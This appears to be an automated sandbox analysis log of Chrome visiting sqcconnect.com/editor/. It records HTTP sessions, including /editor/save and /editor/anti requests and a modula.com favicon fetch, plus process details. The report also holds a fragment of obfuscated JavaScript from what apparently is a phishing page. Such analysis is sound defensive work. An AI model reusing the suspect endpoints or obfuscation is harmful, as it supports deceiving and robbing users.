                                        2024-12-17 14:46:18 UTC1369INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 61 63 69 7a 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 73 6a 4f 69 72 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 50 72 4f 4e 63 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 54 57 77 7a 47 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 50 68 73 67 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 79 48 53 4c 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 62 70 61 6b 64 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69
                                        Data Ascii: :function(h,i){return h(i)},'acizV':function(h,i){return i==h},'sjOir':function(h,i){return h==i},'PrONc':function(h,i){return h<i},'TWwzG':function(h,i){return h&i},'Phsgs':function(h,i){return h-i},'yHSLS':function(h,i){return i==h},'bpakd':function(h,i


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        28192.168.2.1749737103.233.24.194433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:46:20 UTC491OUTGET /editor/save HTTP/1.1
                                        Host: sqcconnect.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: convenient=82bbc753fb82587736ffdf0df4ddb367%3A525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f; minutes=u2W7DENHICSr
                                        2024-12-17 14:46:20 UTC168INHTTP/1.1 400 Bad Request
                                        Date: Tue, 17 Dec 2024 14:46:20 GMT
                                        Server: Apache
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        2024-12-17 14:46:20 UTC153INData Raw: 38 65 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 4f 6e 6c 79 20 50 4f 53 54 20 72 65 71 75 65 73 74 73 20 61 72 65 20 61 6c 6c 6f 77 65 64 22 2c 22 64 65 62 75 67 22 3a 7b 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 6f 73 74 5f 64 61 74 61 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 22 4f 6e 6c 79 20 50 4f 53 54 20 72 65 71 75 65 73 74 73 20 61 72 65 20 61 6c 6c 6f 77 65 64 22 7d 7d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 8e{"status":"error","message":"Only POST requests are allowed","debug":{"method":"GET","post_data":[],"error":"Only POST requests are allowed"}}0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        29192.168.2.1749736103.233.24.194433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:46:20 UTC491OUTGET /editor/anti HTTP/1.1
                                        Host: sqcconnect.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: convenient=82bbc753fb82587736ffdf0df4ddb367%3A525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f; minutes=u2W7DENHICSr
                                        2024-12-17 14:46:21 UTC150INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 14:46:20 GMT
                                        Server: Apache
                                        Content-Length: 0
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        30192.168.2.174973889.35.237.1704433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:46:20 UTC590OUTGET /modula.com/144 HTTP/1.1
                                        Host: api.faviconkit.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://sqcconnect.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-12-17 14:46:21 UTC681INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 14:46:21 GMT
                                        Content-Type: image/png
                                        Content-Length: 9305
                                        Connection: close
                                        Server: BunnyCDN-RI1-892
                                        CDN-PullZone: 696107
                                        CDN-Uid: dd436633-06a0-4b73-b702-b97515feba7a
                                        CDN-RequestCountryCode: US
                                        Cache-Control: public, max-age=31919000
                                        ETag: "672a163f-2459"
                                        Last-Modified: Tue, 05 Nov 2024 12:57:35 GMT
                                        CDN-StorageServer: DE-587
                                        CDN-RequestPullSuccess: True
                                        CDN-FileServer: 456
                                        Perma-Cache: HIT
                                        CDN-ProxyVer: 1.06
                                        CDN-RequestPullCode: 200
                                        CDN-CachedAt: 12/17/2024 14:46:21
                                        CDN-EdgeStorageId: 892
                                        CDN-Status: 200
                                        CDN-RequestTime: 0
                                        CDN-RequestId: 678a5ea6ca5b106644cc2a0f17d68796
                                        CDN-Cache: MISS
                                        Accept-Ranges: bytes
                                        2024-12-17 14:46:21 UTC9305INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b4 00 00 00 b4 08 06 00 00 00 3d cd 06 32 00 00 24 20 49 44 41 54 78 da ec d8 3d 6e 54 41 0c c0 f1 27 84 28 b6 a4 b4 7b 44 11 21 4a 4a 2a c4 09 88 12 25 87 a1 e0 20 f6 0d 38 0b 15 da 13 50 52 44 c8 6e c2 f2 5e bc 33 6f b2 2b 1a 1e 05 fc 7f 92 35 9f 6f 2a ef c8 b3 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 37 d2 f5 69 ba be 4c d7 d7 bf 8b 98 a3 c6 43 df d6 6d ba fc 6a 5f a5 eb f3 09 f8 4b c9 fc 2e 5d bf a4 e9 5d b8 44 b8 46 9e 0a 7b bc 16 4b b4 f1 d0 a6 cd f1 23 5c bf 85 c9 c7 74 79 36 01 5b 49 d3 37 e9 fa 3d 5d ef c3 e4 3e 5a fb 10 b2 9a cf e3 9c 1e fb e9 d5 ef f6 98 d4 5a ed ad b5 4f 13 b0 95 74 fd 5c 09 99 b6 24 dd d2 b6 48 ab f5 21
                                        Data Ascii: PNGIHDR=2$ IDATx=nTA'({D!JJ*% 8PRDn^3o+5o*7iLCmj_K.]]DF{K#\ty6[I7=]>ZZOt\$H!


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        31192.168.2.174973989.35.237.1704433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:46:23 UTC356OUTGET /modula.com/144 HTTP/1.1
                                        Host: api.faviconkit.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-12-17 14:46:24 UTC680INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 14:46:23 GMT
                                        Content-Type: image/png
                                        Content-Length: 9305
                                        Connection: close
                                        Server: BunnyCDN-RI1-892
                                        CDN-PullZone: 696107
                                        CDN-Uid: dd436633-06a0-4b73-b702-b97515feba7a
                                        CDN-RequestCountryCode: US
                                        Cache-Control: public, max-age=31919000
                                        ETag: "672a163f-2459"
                                        Last-Modified: Tue, 05 Nov 2024 12:57:35 GMT
                                        CDN-StorageServer: DE-587
                                        CDN-RequestPullSuccess: True
                                        CDN-FileServer: 456
                                        Perma-Cache: HIT
                                        CDN-ProxyVer: 1.06
                                        CDN-RequestPullCode: 200
                                        CDN-CachedAt: 12/17/2024 14:46:21
                                        CDN-EdgeStorageId: 892
                                        CDN-Status: 200
                                        CDN-RequestTime: 1
                                        CDN-RequestId: f0f44e049669f6f51834dcd98e9c17e8
                                        CDN-Cache: HIT
                                        Accept-Ranges: bytes
                                        2024-12-17 14:46:24 UTC9305INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b4 00 00 00 b4 08 06 00 00 00 3d cd 06 32 00 00 24 20 49 44 41 54 78 da ec d8 3d 6e 54 41 0c c0 f1 27 84 28 b6 a4 b4 7b 44 11 21 4a 4a 2a c4 09 88 12 25 87 a1 e0 20 f6 0d 38 0b 15 da 13 50 52 44 c8 6e c2 f2 5e bc 33 6f b2 2b 1a 1e 05 fc 7f 92 35 9f 6f 2a ef c8 b3 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 37 d2 f5 69 ba be 4c d7 d7 bf 8b 98 a3 c6 43 df d6 6d ba fc 6a 5f a5 eb f3 09 f8 4b c9 fc 2e 5d bf a4 e9 5d b8 44 b8 46 9e 0a 7b bc 16 4b b4 f1 d0 a6 cd f1 23 5c bf 85 c9 c7 74 79 36 01 5b 49 d3 37 e9 fa 3d 5d ef c3 e4 3e 5a fb 10 b2 9a cf e3 9c 1e fb e9 d5 ef f6 98 d4 5a ed ad b5 4f 13 b0 95 74 fd 5c 09 99 b6 24 dd d2 b6 48 ab f5 21
                                        Data Ascii: PNGIHDR=2$ IDATx=nTA'({D!JJ*% 8PRDn^3o+5o*7iLCmj_K.]]DF{K#\ty6[I7=]>ZZOt\$H!


                                        Click to jump to process

                                        Click to jump to process

                                        Click to jump to process

                                        Target ID:0
                                        Start time:09:45:43
                                        Start date:17/12/2024
                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                        Imagebase:0x7ff7d6f10000
                                        File size:3'242'272 bytes
                                        MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:false

                                        Target ID:1
                                        Start time:09:45:44
                                        Start date:17/12/2024
                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=2000,i,529291151797624790,14523265162952734100,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                        Imagebase:0x7ff7d6f10000
                                        File size:3'242'272 bytes
                                        MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:false

                                        Target ID:3
                                        Start time:09:45:45
                                        Start date:17/12/2024
                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sqcconnect.com/editor/?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f"
                                        Imagebase:0x7ff7d6f10000
                                        File size:3'242'272 bytes
                                        MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        No disassembly